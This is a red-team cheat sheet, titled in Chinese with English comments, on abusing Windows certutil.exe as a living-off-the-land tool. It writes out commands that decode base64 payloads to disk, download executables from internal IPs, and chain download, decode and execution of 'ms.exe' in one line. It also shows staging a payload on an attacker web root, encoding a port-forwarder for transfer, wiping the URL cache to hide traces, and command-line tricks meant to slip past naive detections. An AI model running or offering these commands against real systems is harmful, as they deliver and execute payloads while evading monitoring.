Certutil 使用笔记
Certutil Base64 解码写入
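# Drop a base64 blob on disk and let certutil decode it — the LOLBin "decode" step
# (MITRE T1140). Runs on the Windows target from cmd.exe or PowerShell; certutil.exe
# ships with every Windows build, so nothing has to be uploaded first.
# The literal below decodes to `<script>alert(1)</script>`: a harmless XSS PoC string
# that stands in for the real payload (the .jsp output name is just a placeholder).
# No quotes around the literal: cmd.exe does not treat single quotes as quoting, so
# `echo '...'` would write the quote characters into 1.txt as well. The unquoted form
# behaves the same in cmd.exe, PowerShell and sh because the blob has no shell metachars.
echo PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== > 1.txt
# Decode 1.txt -> 2.jsp. Bare base64 is accepted (no PEM header needed).
# NOTE(review): certutil refuses to overwrite an existing output file, so delete 2.jsp
# before re-running — confirm on your build.
certutil.exe -decode 1.txt 2.jsp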
certutil 下载文件
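# Fetch a file over HTTP(S) through certutil's URL cache (LOLBin download, MITRE T1105).
#   -urlcache  operate on the current user's URL cache
#   -f         force a fresh fetch instead of serving a cached copy
#   -split     also write the fetched body out as a file in the current directory
# Generic form (replace URL with an http:// or https:// address the target can reach;
# written without angle brackets because `<`/`>` are redirections in cmd.exe and sh):
certutil.exe -urlcache -split -f URL
# Examples. With no output name the file is saved under the URL's last path segment
# (1.txt / Client.exe here):
certutil.exe -urlcache -split -f http://192.168.245.130:8080/1.txt
# A trailing positional argument names the local output file instead:
certutil.exe -urlcache -split -f http://192.168.245.130:8080/1.txt 2.txt
certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe
certutil.exe -urlcache -split -f http://192.168.1.192/Client.exe 1.exe
# Clean-up: the fetch is recorded in the user's URL cache (listable with
# `certutil -urlcache *`) and stays there until removed. This is the documented
# `-urlcache <url> delete` form; the original note chained it behind `-split -f`,
# which would plausibly re-download before deleting — confirm on a lab box.
certutil.exe -urlcache http://192.168.1.192/Client.exe delete
# OPSEC: certutil with -urlcache is one of the most heavily signatured LOLBin
# patterns (command-line rules in Sysmon/EDR, proxy logs keyed on the
# Microsoft-CryptoAPI user agent); expect it to be alerted on in monitored networks.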
# List every entry in the current user's certutil URL cache — the artifact a
# `-urlcache -split -f` download leaves behind, and what a forensic reviewer checks
# after a suspected certutil download. Use it to verify your `... delete` clean-up.
# `*` is passed literally by cmd.exe; if you type this into a POSIX shell, quote it
# (`"*"`) so the shell does not glob it against the current directory.
certutil.exe -urlcache *
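# Encode a binary to base64 so it can travel as "text" (e.g. pasted through an RDP
# clipboard or a text-only channel); lcx64.exe is presumably the lcx port-forwarder.
# Fixed vs. the original note: the binary is `certutil`, not `ertutil` (typo).
# Output is PEM-style: -----BEGIN/END CERTIFICATE----- lines around 64-column base64;
# -decode accepts it with or without those header lines.
certutil -encode lcx64.exe lcx64.txt
# Reverse step on the receiving side. NOTE(review): certutil errors out rather than
# overwriting an existing lcx64.exe — delete it first if you re-run.
certutil -decode lcx64.txt lcx64.exe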
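# Round trip: base64 the payload on the attacker host, fetch it on the target as a
# plain "text" file, decode with certutil and run it (T1105 followed by T1140).
# --- attacker / C2 host (Linux) ---
# GNU base64 wraps at 76 columns; certutil -decode accepts wrapped input.
base64 payload.exe > /var/www/html/1.txt
# --- target (Windows, cmd.exe) ---
# Fixed vs. the original note: the binary is `certutil` in both steps (the note had
# `certutril` / `certurl`, which simply do not exist), and the URL carries no angle
# brackets — in cmd.exe (and sh) `<` / `>` are redirections and break the command.
# `&&` instead of `&`: cmd's `&` runs the next command unconditionally, so a failed
# download or decode would still execute whatever ms.exe already sits in the directory;
# `&&` stops the chain at the first failing step.
certutil -urlcache -split -f http://192.168.0.107/1.txt && certutil -decode 1.txt ms.exe && ms.exe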
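# Command-line "bypass" variants: a no-argument Certutil (which only prints its usage)
# is chained in front of the real download with `&` or `|`. Presumably this targets
# naive detections that match a command line *starting* with `certutil -urlcache`;
# do not expect it to help against EDRs that parse the whole command line or that
# watch the network fetch itself — verify against the actual controls in scope.
# With `|` the first certutil's usage text is piped into the second one's stdin, where
# it is ignored, so the two lines are functionally the same download.
# Fixed vs. the original note: the option dashes were U+2013 en-dashes (a copy/paste
# artifact from a word processor); certutil only recognises the ASCII `-` prefix.
# `url` is a placeholder for the http:// / https:// address.
Certutil & Certutil -urlcache -f -split url
Certutil | Certutil -urlcache -f -split url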